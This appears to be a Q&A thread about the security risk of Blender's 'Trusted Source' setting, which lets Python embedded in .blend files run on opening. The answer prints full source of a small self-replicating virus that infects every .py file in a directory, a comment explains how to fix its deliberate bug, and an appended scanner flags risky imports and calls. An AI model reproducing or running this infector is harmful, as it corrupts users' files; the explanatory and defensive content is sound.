
I rarely uncheck "Trusted Source" (even when opening files downloaded from sites like this one). What sort of security risks am I leaving myself open to?

I know that with Trusted Source checked, Python scripts can run automatically, but what sort of nefarious things can happen?
This question does not shed much light on what could potentially happen.

Is it possible that just by opening a blend file a virus could get installed?
Examples are welcome.

David

1 Answer


Since the os and sys modules are shipped with Blender, the script could manipulate your files on disk, write files or overwrite them.

It could save some dll libraries or whole programs on your system. It could be malware, sniffing programs, viruses etc.

An example virus by Deque looks like this:

#MAGIC_STRING_skd83749872
import os
import __main__
import random

def infect(filename):
    os.rename(filename, filename + "~")
    destination = open(filename, "w")
    source = open(filename + "~", "r")
    this = open(__main__.__file__, "r")
    for line in this:
        destination.write(line)
        if line.startswith("#MAGIC_STRING_9348788nkmsd"):
            break;
    for line in source:
        destination.write(line)
    source.close()
    destination.close()
    this.close()

def is_infected(filename):
    f = open(filename, "x")
    return f.readline().startswith("#MAGIC_STRING_skd83749872")

def find_and_infect_files():
    path = "."
    dirs = os.listdir(path)
    for filename in dirs:
        if filename.endswith(".py") and not is_infected(filename):
            infect(filename)

find_and_infect_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd

This is "harmless" code capable of replicating itself - it copies itself into every Python file in the working directory (but it could be anywhere on your system). There is a bug in the code to prevent noobs from running it.

Jaroslav Jerryno Novotny
  • In other words, tremendous risk :-| – J Sargent Jan 24 '15 at 18:29
  • I found the bug :) In the is_infected function, it opens the file with "x" instead of "r". "x" is used to create a new file and write to it, and doesn't work if the file already exists, so it's definitely not what you'd use to read an existing file. Another bug (that's less likely to occur) is that it'll crash if there's a directory with a name ending in .py. (I later found out I could google the MAGIC_STRINGs and find the original, since the Deque link no longer works.) – Sparkette Jun 29 '21 at 01:28
  • @flarn2006 yup:) and thx for pointing out that broken link, fixed it. – Jaroslav Jerryno Novotny Jun 29 '21 at 03:24
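
A check a defender could run over a script's text before ticking "Trusted Source", added here as an example (it is not code from the answer or from Blender): it parses the source without executing it and flags the filesystem imports and calls the answer describes. The module and call lists, the function names and the sample string are assumptions made for this illustration.

```python
import ast

# Modules that give a script access to files, processes or the network (illustrative list).
RISKY_MODULES = {"os", "sys", "subprocess", "shutil", "socket", "urllib", "ctypes"}
# Calls that rename, delete or execute (illustrative list).
RISKY_CALLS = {"os.rename", "os.remove", "os.system", "subprocess.Popen",
               "subprocess.run", "eval", "exec"}
WRITE_MODES = set("wax+")  # any of these characters in an open() mode means writing

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None

def audit_script(source):
    """Return sorted (line, finding) pairs for one script's source text."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        # Python 2 syntax or obfuscation: cannot be cleared automatically.
        return [(exc.lineno or 0, "unparseable: review by hand")]
    findings = []
    for node in ast.walk(tree):
        names = [a.name for a in node.names] if isinstance(node, ast.Import) else []
        if isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        for name in names:
            if name.split(".")[0] in RISKY_MODULES:
                findings.append((node.lineno, "imports " + name))
        if isinstance(node, ast.Call):
            target = dotted(node.func)
            if target in RISKY_CALLS:
                findings.append((node.lineno, "calls " + target))
            elif target == "open" and len(node.args) > 1:
                mode = node.args[1]
                literal = isinstance(mode, ast.Constant) and isinstance(mode.value, str)
                if not literal or WRITE_MODES & set(mode.value):
                    findings.append((node.lineno, "opens a file with write or unknown mode"))
    return sorted(findings)

# Constructed sample text; it is only parsed, never executed.
SAMPLE = 'import os\nos.rename("a.py", "a.py~")\nout = open("a.py", "w")\nsrc = open("a.py~", "r")\n'
```

Inside Blender, each embedded text block's source can be read with `as_string()` on the entries of `bpy.data.texts` while auto-run is still disabled. An empty result only means none of the listed patterns appeared, not that the script is safe.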